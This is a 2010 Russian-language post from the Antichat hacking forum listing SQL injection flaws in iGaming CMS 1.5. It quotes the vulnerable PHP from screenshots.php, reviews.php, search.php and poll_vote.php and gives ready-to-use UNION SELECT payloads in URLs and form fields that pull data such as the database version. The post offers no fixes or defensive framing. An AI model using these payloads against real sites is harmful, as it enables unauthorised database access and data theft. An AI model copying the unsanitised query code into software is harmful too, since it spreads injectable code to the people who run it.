17.03.2010, 13:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Дополнение постов [x60]unu...
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com
SQL inj
Файл screenshots.php
mg=off
PHP код:
...if (isset($_REQUEST[id])) {
$result = $db->Execute("SELECT * FROM `sp_screenshots` WHERE `id` = '$_REQUEST[id]' LIMIT 1");
echo $start_table . '<b>',stripslashes($result->fields['title']),'</b>' . $end_table . '<br />';
echo '<center><img src="',$result->fields['screen'],'" border="0" alt="',stripslashes($result->fields['title']),'"></center>';
}...
Result:
http://localhost/gami/screenshots.php?id=1 [sql]
http://localhost/gami/screenshots.php?id=-1'+union+select+1,version(),3,4,5--+
SQL inj
reviews.php
mg=off
PHP код:
... if (isset($_REQUEST['browse'])) {
$sql = $db->Execute("SELECT id,title,section FROM `sp_reviews`
WHERE `title` LIKE '".$_REQUEST['browse']."%'
ORDER BY `title`");...
Result:
http://localhost/gami/reviews.php?browse=Z [sql]
http://localhost/gami/reviews.php?browse=Z'+union+select+1,2,3/*
SQL ing
search.php
mg=off
PHP код:
... if ($_REQUEST['platform'] != 'all') {
$platform = "`section` = '" . $_REQUEST['platform'] . "' ";
} else {
$platform = "`section` LIKE '%' ";
}
if ($_REQUEST['exact'] == '1') {
$title = "`title` = '".$_REQUEST['keywords']."' ";
} else {
$title = "`title` LIKE '%".$_REQUEST['keywords']."%' ";
}
$result = $db->Execute("SELECT id,title,section,publisher,developer FROM `sp_games` WHERE $title AND $platform AND `published` = '1' ORDER BY `title`");
while ($row = $result->FetchNextObject()) {...
Result:
Посылаем пост или гет запрос.
$_REQUEST['keywords'] [sql] или на другую переменную...
поле Keywords пишем - %' union select 1,version(),3,4,5/*
Blind sql
poll_vote.php
PHP код:
$result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'");
$ip = $db->Execute("SELECT * FROM sp_polls_iplog WHERE pollid = '" . $result->fields['poll_id'] . "' AND ip = '" . $_SERVER['REMOTE_ADDR'] . "';") or die($db->ErrorMsg());
if ($ip->RecordCount() < 1)
{
$count2 = $result->fields['count'] + 1;
$db->Execute("UPDATE `sp_polls_options` SET `count` = $count2 WHERE `id` = '$_REQUEST[id]'");
$db->Execute("INSERT INTO sp_polls_iplog (pollid,ip) VALUES ('" . $result->fields['poll_id'] . "','" . $_SERVER['REMOTE_ADDR'] . "');");
}
если чесно даже ковырять впадляк !!! много дыр... 
Последний раз редактировалось Strilo4ka; 17.03.2010 в 15:00..
|
|
|